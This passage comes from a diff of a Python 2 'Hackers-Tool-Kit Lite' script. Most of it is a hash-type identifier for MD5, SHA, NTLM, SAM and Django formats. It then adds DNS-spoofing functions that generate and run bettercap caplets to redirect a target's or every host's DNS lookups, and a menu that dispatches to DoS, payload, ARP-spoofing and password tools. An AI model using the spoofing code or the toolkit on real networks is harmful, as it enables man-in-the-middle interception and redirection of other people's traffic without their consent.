hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] - except: - print "\n" -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("\033[1mhit enter to stop server:\033[0m ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") - -def terminal(): - os.system("gnome-terminal") - -def dnsspoof(): - target = raw_input("\033[1mTarget:\033[0m ") - domain1 = raw_input("\033[1mDomain1:\033[0m ") - domain2 = raw_input("\033[1mDomain2:\033[0m ") - os.system('echo "net.sniff on\n" >> dns.cap') - os.system('echo "set dns.spoof.domains {0},{1}\n" >> dns.cap'.format(domain1,domain2)) - os.system('echo "set dns.spoof.address {0}\n" >> dns.cap'.format(target)) - os.system('echo "dns.spoof on\n" >> dns.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet dns.cap") - os.system("rm dns.cap") - -def dnsspoofall(): - domain1 = raw_input("\033[1mDomain1:\033[0m ") - domain2 = raw_input("\033[1mDomain2:\033[0m ") - os.system('echo "net.sniff on\n" >> dnsall.cap') - os.system('echo "set dns.spoof.domains {0},{1}\n" >> dnsall.cap'.format(domain1,domain2)) - os.system('echo "set dns.spoof.all true\n" >> dnsall.cap') - os.system('echo "dns.spoof on\n" >> dnsall.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet dnsall.cap") - os.system("rm dnsall.cap") - -def main(): - found = False - while not found: - try: - x = raw_input('\033[0mHTK{0}{1}\033[0mLite: '.format(random.choice(colorlist), random.choice(inputlist))) - - if x == "clear": - os.system("clear") - if x == "exit": - print "\nfollow @tuf_unkn0wn on instagram" - print "\nExiting..." - break - os.system("service tor stop") - os.system("service postgresql stop") - sys.exit() - - if x == "banner": - mainbanner() - if x == "?": - helpbanner() - if x == "infoscan": - infoscan() - if x == "infoscan -o": - specscan() - if x == "dos": - dos() - if x == "payload": - payload() - if x == "password": - password() - if x == "reboot": - reboot() - if x == "monitor on": - monitoron() - if x == "monitor off": - monitoroff() - if x == "command": - command() - if x == "anon on": - anonon() - if x == "anon off": - anonoff() - if x == "sysinfo": - sysinfo() - if x == "netscan": - netscan() - if x == "verscan": - verscan() - if x == "wordlist": - wordlist() - if x == "arpspoof": - arpspoof() - if x == "traff": - traff() - if x == "hashid": - hashid() - if x == "aserver": - aserver() - if x == "terminal": - terminal() - if x == "dnsspoof": - dnsspoof() - if x == "dnsspoof --all": - dnsspoofall() - - except: - print "\nfollow @tuf_unkn0wn on instagram" - print "\nExiting..." - break - os.system("service tor stop") - os.system("service postgresql stop") - found = True -try: - if len(sys.argv) < 2: - starting() - print "{0}Welc{1}ome T{2}o Hacke{3}rs-Too{4}l-Kit{5} Lite\033[0m".format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) - time.sleep(1.8) - mainbanner() - main() - if sys.argv[1] == "-h": - print """ --------------------------------------------------------------- --h : this menu - ---commandsearch : search for specific commands - ---commandinfo : more info about the commands - ---commandcount : see how many commands are available - ---run : run a command in htk-lite from the terminal - ---proxy : run htkl with proxychains - ---quickrun : run htkl without starting menu --------------------------------------------------------------- - """ - if 